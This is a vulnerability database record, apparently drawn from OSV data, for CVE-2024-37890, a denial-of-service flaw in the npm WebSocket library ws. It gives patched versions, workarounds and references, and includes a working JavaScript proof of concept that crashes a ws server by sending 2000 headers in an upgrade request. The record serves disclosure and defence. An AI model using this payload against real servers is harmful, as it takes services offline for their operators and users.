{"id":"CVE-2024-37890","aliases":["GHSA-3h5v-q93c-6h6q"],"url":"https://o3.security/vulnerability/CVE-2024-37890","summary":"Denial of service when handling a request with many HTTP headers in ws","details":"### Impact\n\nA request with a number of headers exceeding the [`server.maxHeadersCount`][] threshold could be used to crash a ws server.\n\n### Proof of concept\n\n```js\nconst http = require('http');\nconst WebSocket = require('ws');\n\nconst wss = new WebSocket.Server({ port: 0 }, function () {\n  const chars = \"!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~\".split('');\n  const headers = {};\n  let count = 0;\n\n  for (let i = 0; i < chars.length; i++) {\n    if (count === 2000) break;\n\n    for (let j = 0; j < chars.length; j++) {\n      const key = chars[i] + chars[j];\n      headers[key] = 'x';\n\n      if (++count === 2000) break;\n    }\n  }\n\n  headers.Connection = 'Upgrade';\n  headers.Upgrade = 'websocket';\n  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';\n  headers['Sec-WebSocket-Version'] = '13';\n\n  const request = http.request({\n    headers: headers,\n    host: '127.0.0.1',\n    port: wss.address().port\n  });\n\n  request.end();\n});\n```\n\n### Patches\n\nThe vulnerability was fixed in ws@8.17.1 (https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c) and backported to ws@7.5.10 (https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f), ws@6.2.3 (https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63), and ws@5.2.4 (https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e).\n\n### Workarounds\n\nIn vulnerable versions of ws, the issue can be mitigated in the following ways:\n\n1. Reduce the maximum allowed length of the request headers using the [`--max-http-header-size=size`][] and/or the [`maxHeaderSize`][] options so that no more headers than the `server.maxHeadersCount` limit can be sent.\n2. Set `server.maxHeadersCount` to `0` so that no limit is applied.\n\n### Credits\n\nThe vulnerability was reported by [Ryan LaPointe](https://github.com/rrlapointe) in https://github.com/websockets/ws/issues/2230.\n\n### References\n\n- https://github.com/advisories/GHSA-3h5v-q93c-6h6q\n- https://www.cve.org/CVERecord?id=CVE-2024-37890\n- https://github.com/websockets/ws/issues/2230\n- https://github.com/websockets/ws/pull/2231\n\n[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize\n[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener\n[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount","published":"2024-06-17T19:09:02.127Z","modified":"2026-08-12T03:51:20.815658442Z","cvss":{"score":7.5,"severity":"HIGH","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},"epss":{"score":0.01357,"percentile":0.70313,"asOf":"2026-09-17"},"cisaKev":null,"exploitsKnown":0,"affectedPackages":[{"ecosystem":"npm","name":"ws","fixedVersion":"5.2.4"},{"ecosystem":"npm","name":"ws","fixedVersion":"6.2.3"},{"ecosystem":"npm","name":"ws","fixedVersion":"7.5.10"},{"ecosystem":"npm","name":"ws","fixedVersion":"8.17.1"}],"fix":{"url":"https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f","label":"websockets/ws@22c2876"},"references":[{"type":"WEB","url":"https://nodejs.org/api/http.html#servermaxheaderscount"},{"type":"ADVISORY","url":"https://github.com/CVEProject/cvelistV5/tree/main/cves/2024/37xxx/CVE-2024-37890.json"},{"type":"ADVISORY","url":"https://github.com/websockets/ws/security/advisories/GHSA-3h5v-q93c-6h6q"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2024-37890"},{"type":"REPORT","url":"https://github.com/websockets/ws/issues/2230"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/22c28763234aa75a7e1b76f5c01c181260d7917f"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/4abd8f6de4b0b65ef80b3ff081989479ed93377e"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/e55e5106f10fcbaac37cfa89759e4cc0d073a52c"},{"type":"FIX","url":"https://github.com/websockets/ws/commit/eeb76d313e2a00dd5247ca3597bba7877d064a63"},{"type":"FIX","url":"https://github.com/websockets/ws/pull/2231"},{"type":"PACKAGE","url":"https://github.com/websockets/ws"}],"provenance":{"sources":["OSV.dev","FIRST.org (EPSS)"],"lastVerified":"2026-08-12T03:51:20.815658442Z"}}